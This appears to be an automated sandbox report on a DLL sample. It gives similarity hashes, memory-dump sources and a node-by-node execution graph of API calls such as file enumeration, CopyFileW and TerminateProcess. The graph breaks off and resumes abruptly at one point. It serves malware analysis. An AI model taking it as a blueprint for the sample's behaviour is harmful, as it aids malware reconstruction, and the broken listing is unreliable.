                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: 0c4de394c03ae4b405f4ec3e0fcd20e9010cf2465c37f058de9966e8af33cf99
                • Instruction ID: 4b911e8d7e92d117fbcf38956c20f8a0c1fc592f80aada0b1db5d02d2194119f
                • Opcode Fuzzy Hash: 0c4de394c03ae4b405f4ec3e0fcd20e9010cf2465c37f058de9966e8af33cf99
                • Instruction Fuzzy Hash: F0F0A237545129BBCF222FE5CC05A893F66EF0A765B154460FA1995121CA36CC20DB91
                APIs
                • RtlEncodePointer.KERNEL32(00000000,?), ref: 6B926EA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: 287be66390cd92bc696adaad56ae708c88829332aa40badfd4022e1fea83bf6b
                • Instruction ID: be15016ad01f63012425d1069b906675305003b6937e9b97a0cfcb0226eb07bc
                • Opcode Fuzzy Hash: 287be66390cd92bc696adaad56ae708c88829332aa40badfd4022e1fea83bf6b
                • Instruction Fuzzy Hash: ED414C71D10209AFDF05CFA4CC81AEE7BB9FF49308F248099F9186A218D339E961DB51

                Execution Graph

                Execution Coverage:2.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:2000
                Total number of Limit Nodes:10
                execution_graph 13761 6f9e1c1a 13762 6f9e1c21 13761->13762 13763 6f9e1fbf 13762->13763 13773 6f9e1c2b 13762->13773 14180 6f9e32d8 13763->14180 13765 6f9e1c47 13766 6f9e1fd2 13767 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13766->13767 13768 6f9e1fe1 13767->13768 14183 6f9e4ad5 13768->14183 13770 6f9e1fa5 FindNextFileW 13770->13765 13770->13773 13772 6f9e1ffc 13773->13765 13773->13770 13780 6f9e1d10 __DllMainCRTStartup@12 _strlen 13773->13780 13796 6f9e1075 13773->13796 13799 6f9e1b85 13773->13799 13776 6f9e1075 __DllMainCRTStartup@12 43 API calls 13777 6f9e1f5e TerminateProcess CloseHandle CloseHandle 13776->13777 14137 6f9e2004 13777->14137 13780->13776 13781 6f9e1075 __DllMainCRTStartup@12 43 API calls 13780->13781 13837 6f9e1135 13780->13837 13840 6f9ed5ab 13780->13840 13781->13780 13787 6f9e32d8 39 API calls __DllMainCRTStartup@12 13792 6f9e1db2 13787->13792 13789 6f9e3389 __DllMainCRTStartup@12 40 API calls 13789->13792 13790 6f9e33f1 40 API calls __DllMainCRTStartup@12 13790->13792 13792->13787 13792->13789 13792->13790 13794 6f9e1075 __DllMainCRTStartup@12 43 API calls 13792->13794 13847 6f9e3854 13792->13847 13850 6f9e32f1 13792->13850 13854 6f9e32c2 13792->13854 13857 6f9e16ba 13792->13857 13861 6f9e2430 CoInitialize 76CCE550 13792->13861 13795 6f9e1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13794->13795 13795->13773 14190 6f9e1035 13796->14190 13800 6f9e1bca __DllMainCRTStartup@12 13799->13800 13801 6f9e1075 __DllMainCRTStartup@12 43 API calls 13800->13801 13802 6f9e1bfd FindFirstFileW 13801->13802 13803 6f9e1c21 13802->13803 13804 6f9e1fbf 13803->13804 13814 6f9e1c2b 13803->13814 13805 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13804->13805 13807 6f9e1fd2 13805->13807 13806 6f9e1c47 13806->13773 13808 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13807->13808 13809 6f9e1fe1 13808->13809 13810 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13809->13810 13813 6f9e1ffc 13810->13813 13811 6f9e1fa5 
FindNextFileW 13811->13806 13811->13814 13812 6f9e1075 __DllMainCRTStartup@12 43 API calls 13812->13814 13813->13773 13814->13806 13814->13811 13814->13812 13815 6f9e1b85 __DllMainCRTStartup@12 110 API calls 13814->13815 13821 6f9e1d10 __DllMainCRTStartup@12 _strlen 13814->13821 13815->13814 13816 6f9e1135 __DllMainCRTStartup@12 44 API calls 13816->13821 13817 6f9e1075 __DllMainCRTStartup@12 43 API calls 13818 6f9e1f5e TerminateProcess CloseHandle CloseHandle 13817->13818 13819 6f9e2004 __DllMainCRTStartup@12 81 API calls 13818->13819 13820 6f9e1fa3 13819->13820 13820->13811 13821->13816 13821->13817 13822 6f9e1075 __DllMainCRTStartup@12 43 API calls 13821->13822 13823 6f9ed5ab ___std_exception_destroy 14 API calls 13821->13823 13822->13821 13824 6f9e1d89 ExpandEnvironmentStringsW 13823->13824 13825 6f9e3389 __DllMainCRTStartup@12 40 API calls 13824->13825 13834 6f9e1db2 13825->13834 13826 6f9e3854 __DllMainCRTStartup@12 40 API calls 13826->13834 13827 6f9e32f1 __DllMainCRTStartup@12 39 API calls 13827->13834 13828 6f9e32d8 39 API calls __DllMainCRTStartup@12 13828->13834 13829 6f9e32c2 __DllMainCRTStartup@12 40 API calls 13829->13834 13830 6f9e3389 __DllMainCRTStartup@12 40 API calls 13830->13834 13831 6f9e33f1 40 API calls __DllMainCRTStartup@12 13831->13834 13832 6f9e16ba __DllMainCRTStartup@12 39 API calls 13832->13834 13833 6f9e2430 __DllMainCRTStartup@12 96 API calls 13833->13834 13834->13826 13834->13827 13834->13828 13834->13829 13834->13830 13834->13831 13834->13832 13834->13833 13835 6f9e1075 __DllMainCRTStartup@12 43 API calls 13834->13835 13836 6f9e1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13835->13836 13836->13814 14721 6f9e10f5 13837->14721 13841 6f9f0444 ___free_lconv_mon 14 API calls 13840->13841 13842 6f9e1d89 ExpandEnvironmentStringsW 13841->13842 13843 6f9e3389 13842->13843 13844 6f9e33bb __DllMainCRTStartup@12 13843->13844 14897 6f9e38b4 13844->14897 15009 6f9e3cbc 13847->15009 13849 6f9e3869 __DllMainCRTStartup@12 13849->13792 
13852 6f9e3302 __DllMainCRTStartup@12 13850->13852 13851 6f9e3308 __DllMainCRTStartup@12 13851->13792 13852->13851 15060 6f9e34ca 13852->15060 15064 6f9e329b 13854->15064 13858 6f9e16ca __DllMainCRTStartup@12 13857->13858 13859 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13858->13859 13860 6f9e171a 13859->13860 13860->13792 13862 6f9e249a 13861->13862 13863 6f9e24eb 13861->13863 15085 6f9e10c5 13862->15085 15089 6f9e33f1 13863->15089 13869 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13871 6f9e24c5 13869->13871 13873 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13871->13873 13875 6f9e24d1 13873->13875 13874 6f9e2519 15101 6f9e1654 VariantInit 13874->15101 13877 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13875->13877 13913 6f9e24e0 13877->13913 13878 6f9e253e 15102 6f9e1654 VariantInit 13878->15102 13880 6f9e2563 15103 6f9e1654 VariantInit 13880->15103 13881 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13883 6f9e325d 13881->13883 13883->13792 13884 6f9e2588 15104 6f9e16a8 VariantClear 13884->15104 13886 6f9e25fb 15105 6f9e16a8 VariantClear 13886->15105 13888 6f9e260a 15106 6f9e16a8 VariantClear 13888->15106 13890 6f9e2619 15107 6f9e16a8 VariantClear 13890->15107 13892 6f9e2628 13893 6f9e262e 13892->13893 13894 6f9e2690 13892->13894 13896 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13893->13896 15108 6f9e1456 13894->15108 13897 6f9e263b 76C9D120 13896->13897 13899 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13897->13899 13901 6f9e2661 13899->13901 13900 6f9e26a1 __DllMainCRTStartup@12 15113 6f9e14e7 13900->15113 13903 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13901->13903 13905 6f9e266d 13903->13905 13908 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13905->13908 13906 6f9e273d 13915 6f9e27c8 13906->13915 13916 6f9e2766 13906->13916 13907 6f9e26db 13909 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13907->13909 13910 6f9e2679 13908->13910 13911 6f9e26e8 76C9D120 13909->13911 13912 6f9e32d8 __DllMainCRTStartup@12 39 API calls 
13910->13912 13917 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13911->13917 13912->13913 13913->13881 13923 6f9e27e4 13915->13923 13924 6f9e2851 13915->13924 13919 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13916->13919 13918 6f9e270e 13917->13918 13920 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13918->13920 13921 6f9e2773 76C9D120 13919->13921 13922 6f9e271a 13920->13922 13929 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13921->13929 13926 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13922->13926 13928 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13923->13928 13927 6f9e1456 __DllMainCRTStartup@12 4 API calls 13924->13927 13930 6f9e2726 13926->13930 13936 6f9e285e __DllMainCRTStartup@12 13927->13936 13931 6f9e27f1 76C9D120 13928->13931 13932 6f9e2799 13929->13932 13933 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13930->13933 13940 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13931->13940 13934 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13932->13934 13933->13913 13935 6f9e27a5 13934->13935 13938 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13935->13938 13939 6f9e14e7 __DllMainCRTStartup@12 SysFreeString 13936->13939 13941 6f9e27b1 13938->13941 13942 6f9e288e 13939->13942 13943 6f9e2822 13940->13943 13944 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13941->13944 13947 6f9e289f 13942->13947 13948 6f9e290c 13942->13948 13945 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13943->13945 13944->13913 13946 6f9e282e 13945->13946 13949 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13946->13949 13950 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13947->13950 13954 6f9e2928 13948->13954 13960 6f9e2995 13948->13960 13951 6f9e283a 13949->13951 13952 6f9e28ac 76C9D120 13950->13952 13953 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13951->13953 13958 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13952->13958 13953->13913 13955 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13954->13955 13956 6f9e2935 76C9D120 13955->13956 13964 6f9e32d8 __DllMainCRTStartup@12 39 API calls 
13956->13964 13959 6f9e28dd 13958->13959 13962 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13959->13962 13967 6f9e29d6 13960->13967 13968 6f9e2a43 13960->13968 13963 6f9e28e9 13962->13963 13966 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13963->13966 13965 6f9e2966 13964->13965 13969 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13965->13969 13970 6f9e28f5 13966->13970 13971 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13967->13971 13976 6f9e2a5f 13968->13976 13977 6f9e2acc 13968->13977 13972 6f9e2972 13969->13972 13973 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13970->13973 13974 6f9e29e3 76C9D120 13971->13974 13975 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13972->13975 13973->13913 13983 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13974->13983 13978 6f9e297e 13975->13978 13979 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13976->13979 13984 6f9e2af5 13977->13984 13985 6f9e2b62 13977->13985 13980 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13978->13980 13981 6f9e2a6c 76C9D120 13979->13981 13980->13913 13991 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13981->13991 13986 6f9e2a14 13983->13986 13987 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13984->13987 13997 6f9e2b8d 13985->13997 13998 6f9e2bfa 13985->13998 13989 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13986->13989 13990 6f9e2b02 76C9D120 13987->13990 13992 6f9e2a20 13989->13992 14006 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13990->14006 13993 6f9e2a9d 13991->13993 13994 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13992->13994 13995 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13993->13995 13996 6f9e2a2c 13994->13996 13999 6f9e2aa9 13995->13999 14002 6f9e10c5 __DllMainCRTStartup@12 70 API calls 13997->14002 14001 6f9e1456 __DllMainCRTStartup@12 4 API calls 13998->14001 14004 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13999->14004 14014 6f9e2c07 __DllMainCRTStartup@12 14001->14014 14005 6f9e2b9a 76C9D120 14002->14005 14016 6f9e32d8 __DllMainCRTStartup@12 39 API calls 14005->14016 14008 6f9e2b33 
14006->14008 14010 6f9e32d8 __DllMainCRTStartup@12 39 API calls 14008->14010 14011 6f9e2b3f 14010->14011 14015 6f9e14e7 __DllMainCRTStartup@12 SysFreeString 14014->14015 14018 6f9e2c37 14015->14018 14019 6f9e2bcb 14016->14019 14021 6f9e2c4a __DllMainCRTStartup@12 14018->14021 14023 6f9e10c5 __DllMainCRTStartup@12 70 API calls 14018->14023 14022 6f9e32d8 __DllMainCRTStartup@12 39 API calls 14019->14022 14023->14021 15363 6f9ecd5b 14137->15363 14140 6f9e2065 14143 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14140->14143 14145 6f9e1fa3 14143->14145 14145->13770 14149 6f9ecd5b __DllMainCRTStartup@12 42 API calls 14150 6f9e208f ___std_exception_copy 14149->14150 15391 6f9edb99 14150->15391 14152 6f9e20bb __DllMainCRTStartup@12 15394 6f9ecb0d 14152->15394 14155 6f9ed5ab ___std_exception_destroy 14 API calls 14156 6f9e2129 __fread_nolock __DllMainCRTStartup@12 14155->14156 14156->14140 14157 6f9ecb0d __DllMainCRTStartup@12 42 API calls 14156->14157 14158 6f9e219c 14157->14158 14159 6f9ed5ab ___std_exception_destroy 14 API calls 14158->14159 14160 6f9e21aa 14159->14160 14160->14140 14161 6f9ecd5b __DllMainCRTStartup@12 42 API calls 14160->14161 14164 6f9e21e5 __fread_nolock __DllMainCRTStartup@12 14161->14164 14162 6f9e239e 14162->14140 14163 6f9ecec7 __DllMainCRTStartup@12 69 API calls 14162->14163 14163->14140 14164->14140 14164->14162 14165 6f9ecb0d __DllMainCRTStartup@12 42 API calls 14164->14165 14166 6f9e227e 14165->14166 14167 6f9ed5ab ___std_exception_destroy 14 API calls 14166->14167 14168 6f9e2290 __fread_nolock __DllMainCRTStartup@12 14167->14168 14169 6f9ecb0d __DllMainCRTStartup@12 42 API calls 14168->14169 14170 6f9e22f5 14169->14170 14171 6f9ed5ab ___std_exception_destroy 14 API calls 14170->14171 14172 6f9e2307 ___std_exception_copy __DllMainCRTStartup@12 14171->14172 14173 6f9ed5ab ___std_exception_destroy 14 API calls 14172->14173 14174 6f9e2371 14173->14174 15400 6f9ed4df 14174->15400 14181 6f9e34ca __DllMainCRTStartup@12 
39 API calls 14180->14181 14182 6f9e32e7 __DllMainCRTStartup@12 14181->14182 14182->13766 14184 6f9e4ade IsProcessorFeaturePresent 14183->14184 14185 6f9e4add 14183->14185 14187 6f9e4f19 14184->14187 14185->13772 15940 6f9e4edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14187->15940 14189 6f9e4ffc 14189->13772 14191 6f9e104e __vfwprintf_l 14190->14191 14194 6f9ec76c 14191->14194 14195 6f9ec780 __vfwprintf_l 14194->14195 14200 6f9e85e0 14195->14200 14201 6f9e860f 14200->14201 14202 6f9e85ec 14200->14202 14206 6f9e8636 14201->14206 14223 6f9e83be 14201->14223 14214 6f9ede7c 14202->14214 14204 6f9ede7c __vfwprintf_l 29 API calls 14207 6f9e8607 14204->14207 14206->14204 14206->14207 14208 6f9e7d4e 14207->14208 14209 6f9e7d5a 14208->14209 14210 6f9e7d71 14209->14210 14211 6f9e8197 __vfwprintf_l 39 API calls 14209->14211 14212 6f9e8197 __vfwprintf_l 39 API calls 14210->14212 14213 6f9e1058 14210->14213 14211->14210 14212->14213 14213->13773 14215 6f9ede8c 14214->14215 14216 6f9ede93 14214->14216 14234 6f9e8151 GetLastError 14215->14234 14220 6f9edea1 14216->14220 14238 6f9edcd4 14216->14238 14219 6f9edec8 14219->14220 14241 6f9edf26 IsProcessorFeaturePresent 14219->14241 14220->14207 14222 6f9edef8 14224 6f9e840d 14223->14224 14225 6f9e83ea 14223->14225 14224->14225 14229 6f9e8415 __DllMainCRTStartup@12 14224->14229 14226 6f9ede7c __vfwprintf_l 29 API calls 14225->14226 14227 6f9e8402 14226->14227 14228 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14227->14228 14230 6f9e853f 14228->14230 14376 6f9ea9ff 14229->14376 14230->14206 14235 6f9e816a 14234->14235 14245 6f9ef699 14235->14245 14239 6f9edcdf GetLastError SetLastError 14238->14239 14240 6f9edcf8 14238->14240 14239->14219 14240->14219 14242 6f9edf32 14241->14242 14370 6f9edcfd 14242->14370 14246 6f9ef6ac 14245->14246 14247 6f9ef6b2 14245->14247 14267 6f9f1930 14246->14267 14251 6f9e8182 SetLastError 14247->14251 14272 6f9f196f 14247->14272 
14251->14216 14254 6f9ef6f9 14257 6f9f196f __dosmaperr 6 API calls 14254->14257 14255 6f9ef6e4 14256 6f9f196f __dosmaperr 6 API calls 14255->14256 14258 6f9ef6f0 14256->14258 14259 6f9ef705 14257->14259 14284 6f9f0444 14258->14284 14260 6f9ef718 14259->14260 14261 6f9ef709 14259->14261 14290 6f9ef299 14260->14290 14263 6f9f196f __dosmaperr 6 API calls 14261->14263 14263->14258 14266 6f9f0444 ___free_lconv_mon 14 API calls 14266->14251 14295 6f9f17ce 14267->14295 14269 6f9f194c 14270 6f9f1967 TlsGetValue 14269->14270 14271 6f9f1955 14269->14271 14271->14247 14273 6f9f17ce __dosmaperr 5 API calls 14272->14273 14274 6f9f198b 14273->14274 14275 6f9f19a9 TlsSetValue 14274->14275 14276 6f9ef6cc 14274->14276 14276->14251 14277 6f9f1658 14276->14277 14282 6f9f1665 __dosmaperr 14277->14282 14278 6f9f16a5 14312 6f9f0431 14278->14312 14279 6f9f1690 RtlAllocateHeap 14280 6f9ef6dc 14279->14280 14279->14282 14280->14254 14280->14255 14282->14278 14282->14279 14309 6f9edf8f 14282->14309 14285 6f9f044f HeapFree 14284->14285 14289 6f9f0479 14284->14289 14286 6f9f0464 GetLastError 14285->14286 14285->14289 14287 6f9f0471 __dosmaperr 14286->14287 14288 6f9f0431 __dosmaperr 12 API calls 14287->14288 14288->14289 14289->14251 14344 6f9ef12d 14290->14344 14296 6f9f17fe 14295->14296 14297 6f9f17fa __dosmaperr 14295->14297 14296->14297 14301 6f9f1703 14296->14301 14297->14269 14300 6f9f1818 GetProcAddress 14300->14297 14307 6f9f1714 ___vcrt_FlsSetValue 14301->14307 14302 6f9f17aa 14302->14297 14302->14300 14303 6f9f1732 LoadLibraryExW 14304 6f9f174d GetLastError 14303->14304 14305 6f9f17b1 14303->14305 14304->14307 14305->14302 14306 6f9f17c3 FreeLibrary 14305->14306 14306->14302 14307->14302 14307->14303 14308 6f9f1780 LoadLibraryExW 14307->14308 14308->14305 14308->14307 14315 6f9edfbb 14309->14315 14321 6f9ef5e8 GetLastError 14312->14321 14314 6f9f0436 14314->14280 14316 6f9edfc7 ___scrt_is_nonwritable_in_current_image 14315->14316 14317 6f9f351f __FrameHandler3::FrameUnwindToState 
15448 6f9f1e96 15442->15448 15454 6f9f19b1 15442->15454 15443->15437 15443->15443 15443->15448 15452 6f9ecc7d RtlEnterCriticalSection 15443->15452 15453 6f9ecc91 RtlLeaveCriticalSection 15443->15453 15449 6f9f1ecf 15448->15449 15460 6f9f3567 RtlLeaveCriticalSection 15449->15460 15451 6f9eccf5 15451->15419 15451->15420 15452->15443 15453->15443 15455 6f9f17ce __dosmaperr 5 API calls 15454->15455 15456 6f9f19cd 15455->15456 15457 6f9f19eb InitializeCriticalSectionAndSpinCount 15456->15457 15458 6f9f19d6 15456->15458 15457->15458 15459 6f9ecc7d RtlEnterCriticalSection 15458->15459 15459->15448 15460->15451 15461->15433 15464 6f9ecf7d ___scrt_is_nonwritable_in_current_image 15462->15464 15463 6f9ecf83 15465 6f9ede7c __vfwprintf_l 29 API calls 15463->15465 15464->15463 15466 6f9ecfc6 15464->15466 15468 6f9ecf9e 15465->15468 15473 6f9ecc7d RtlEnterCriticalSection 15466->15473 15468->15377 15469 6f9ecfd2 15474 6f9ed0f4 15469->15474 15471 6f9ecfe8 15483 6f9ed011 15471->15483 15473->15469 15475 6f9ed11a 15474->15475 15476 6f9ed107 15474->15476 15486 6f9ed01b 15475->15486 15476->15471 15478 6f9ed13d __DllMainCRTStartup@12 15479 6f9f1d58 __vfwprintf_l 64 API calls 15478->15479 15482 6f9ed1cb 15478->15482 15480 6f9ed16b 15479->15480 15490 6f9ef10f 15480->15490 15482->15471 15521 6f9ecc91 RtlLeaveCriticalSection 15483->15521 15485 6f9ed019 15485->15468 15487 6f9ed02c 15486->15487 15489 6f9ed084 __DllMainCRTStartup@12 15486->15489 15487->15489 15493 6f9ef0cf 15487->15493 15489->15478 15491 6f9eefee __fread_nolock 41 API calls 15490->15491 15492 6f9ef128 15491->15492 15492->15482 15494 6f9ef0e3 __vfwprintf_l 15493->15494 15499 6f9eefee 15494->15499 15496 6f9ef0f8 15497 6f9e7d4e __vfwprintf_l 39 API calls 15496->15497 15498 6f9ef107 15497->15498 15498->15489 15505 6f9f52de 15499->15505 15501 6f9ef000 15502 6f9ef01c SetFilePointerEx 15501->15502 15504 6f9ef008 __wsopen_s 15501->15504 15503 6f9ef034 GetLastError 15502->15503 15502->15504 15503->15504 15504->15496 15506 6f9f52eb 
15505->15506 15507 6f9f5300 15505->15507 15518 6f9f041e 15506->15518 15509 6f9f041e __dosmaperr 14 API calls 15507->15509 15511 6f9f5325 15507->15511 15512 6f9f5330 15509->15512 15511->15501 15514 6f9f0431 __dosmaperr 14 API calls 15512->15514 15513 6f9f0431 __dosmaperr 14 API calls 15515 6f9f52f8 15513->15515 15516 6f9f5338 15514->15516 15515->15501 15517 6f9edef9 __wsopen_s 39 API calls 15516->15517 15517->15515 15519 6f9ef5e8 __dosmaperr 14 API calls 15518->15519 15520 6f9f0423 15519->15520 15520->15513 15521->15485 15523 6f9e7abf ___scrt_is_nonwritable_in_current_image 15522->15523 15524 6f9e7ac6 15523->15524 15525 6f9e7ae7 15523->15525 15526 6f9ede7c __vfwprintf_l 29 API calls 15524->15526 15533 6f9ecc7d RtlEnterCriticalSection 15525->15533 15529 6f9e7adf 15526->15529 15528 6f9e7af2 15534 6f9e7b33 15528->15534 15529->15383 15533->15528 15540 6f9e7b65 15534->15540 15536 6f9e7b01 15537 6f9e7b29 15536->15537 15591 6f9ecc91 RtlLeaveCriticalSection 15537->15591 15539 6f9e7b31 15539->15529 15541 6f9e7b9c 15540->15541 15542 6f9e7b74 15540->15542 15544 6f9eeea2 __fread_nolock 39 API calls 15541->15544 15543 6f9ede7c __vfwprintf_l 29 API calls 15542->15543 15552 6f9e7b8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15543->15552 15545 6f9e7ba5 15544->15545 15553 6f9ef0b1 15545->15553 15548 6f9e7c4f 15556 6f9e7f55 15548->15556 15550 6f9e7c66 __DllMainCRTStartup@12 15550->15552 15568 6f9e7d8a 15550->15568 15552->15536 15575 6f9eeec9 15553->15575 15557 6f9e7f64 __wsopen_s 15556->15557 15558 6f9eeea2 __fread_nolock 39 API calls 15557->15558 15560 6f9e7f80 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15558->15560 15559 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15561 6f9e80fe 15559->15561 15562 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15560->15562 15567 6f9e7f8c 15560->15567 15561->15552 15563 6f9e7fe0 15562->15563 15564 6f9e8012 ReadFile 15563->15564 15563->15567 15565 6f9e8039 15564->15565 15564->15567 15566 6f9ef0b1 
__DllMainCRTStartup@12 43 API calls 15565->15566 15566->15567 15567->15559 15569 6f9eeea2 __fread_nolock 39 API calls 15568->15569 15570 6f9e7d9d 15569->15570 15571 6f9e7de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 15570->15571 15572 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15570->15572 15571->15552 15573 6f9e7e44 15572->15573 15573->15571 15574 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15573->15574 15574->15571 15576 6f9eeed5 ___scrt_is_nonwritable_in_current_image 15575->15576 15577 6f9eef18 15576->15577 15578 6f9eef5e 15576->15578 15585 6f9e7bc3 15576->15585 15579 6f9ede7c __vfwprintf_l 29 API calls 15577->15579 15586 6f9f5062 RtlEnterCriticalSection 15578->15586 15579->15585 15581 6f9eef64 15582 6f9eef85 15581->15582 15583 6f9eefee __fread_nolock 41 API calls 15581->15583 15587 6f9eefe6 15582->15587 15583->15582 15585->15548 15585->15550 15585->15552 15586->15581 15590 6f9f5117 RtlLeaveCriticalSection 15587->15590 15589 6f9eefec 15589->15585 15590->15589 15591->15539 15593 6f9ecdae ___scrt_is_nonwritable_in_current_image 15592->15593 15594 6f9ecddb 15593->15594 15595 6f9ecdb8 15593->15595 15598 6f9ecdd3 __DllMainCRTStartup@12 15594->15598 15603 6f9ecc7d RtlEnterCriticalSection 15594->15603 15596 6f9ede7c __vfwprintf_l 29 API calls 15595->15596 15596->15598 15598->15388 15599 6f9ecdf9 15604 6f9ece39 15599->15604 15601 6f9ece06 15618 6f9ece31 15601->15618 15603->15599 15605 6f9ece46 15604->15605 15607 6f9ece69 15604->15607 15606 6f9ede7c __vfwprintf_l 29 API calls 15605->15606 15609 6f9ece61 __DllMainCRTStartup@12 15606->15609 15608 6f9f1d58 __vfwprintf_l 64 API calls 15607->15608 15607->15609 15610 6f9ece81 15608->15610 15609->15601 15621 6f9f1e2f 15610->15621 15613 6f9eeea2 __fread_nolock 39 API calls 15614 6f9ece95 15613->15614 15625 6f9f2473 15614->15625 15617 6f9f0444 ___free_lconv_mon 14 API calls 15617->15609 15667 6f9ecc91 RtlLeaveCriticalSection 15618->15667 15620 6f9ece37 15620->15598 15622 6f9f1e46 15621->15622 15624 
6f9ece89 15621->15624 15623 6f9f0444 ___free_lconv_mon 14 API calls 15622->15623 15622->15624 15623->15624 15624->15613 15626 6f9f249c 15625->15626 15627 6f9ece9c 15625->15627 15628 6f9f24eb 15626->15628 15630 6f9f24c3 15626->15630 15627->15609 15627->15617 15629 6f9ede7c __vfwprintf_l 29 API calls 15628->15629 15629->15627 15632 6f9f23e2 15630->15632 15633 6f9f23ee ___scrt_is_nonwritable_in_current_image 15632->15633 15640 6f9f5062 RtlEnterCriticalSection 15633->15640 15635 6f9f23fc 15636 6f9f242d 15635->15636 15641 6f9f2546 15635->15641 15654 6f9f2467 15636->15654 15640->15635 15642 6f9f52de __wsopen_s 39 API calls 15641->15642 15645 6f9f2556 15642->15645 15643 6f9f255c 15657 6f9f524d 15643->15657 15645->15643 15646 6f9f52de __wsopen_s 39 API calls 15645->15646 15652 6f9f258e 15645->15652 15648 6f9f2585 15646->15648 15647 6f9f52de __wsopen_s 39 API calls 15649 6f9f259a CloseHandle 15647->15649 15650 6f9f52de __wsopen_s 39 API calls 15648->15650 15649->15643 15651 6f9f25a6 GetLastError 15649->15651 15650->15652 15651->15643 15652->15643 15652->15647 15653 6f9f25b4 __wsopen_s 15653->15636 15666 6f9f5117 RtlLeaveCriticalSection 15654->15666 15656 6f9f2450 15656->15627 15658 6f9f52c3 15657->15658 15660 6f9f525c 15657->15660 15659 6f9f0431 __dosmaperr 14 API calls 15658->15659 15661 6f9f52c8 15659->15661 15660->15658 15665 6f9f5286 __wsopen_s 15660->15665 15662 6f9f041e __dosmaperr 14 API calls 15661->15662 15663 6f9f52b3 15662->15663 15663->15653 15664 6f9f52ad SetStdHandle 15664->15663 15665->15663 15665->15664 15666->15656 15667->15620 15670 6f9edbc2 ___scrt_is_nonwritable_in_current_image 15668->15670 15669 6f9edbb1 15669->14152 15670->15669 15671 6f9edc0c 15670->15671 15672 6f9edbd5 __fread_nolock 15670->15672 15681 6f9ecc7d RtlEnterCriticalSection 15671->15681 15674 6f9f0431 __dosmaperr 14 API calls 15672->15674 15676 6f9edbef 15674->15676 15675 6f9edc16 15682 6f9ed9c0 15675->15682 15678 6f9edef9 __wsopen_s 39 API calls 15676->15678 15678->15669 15681->15675 
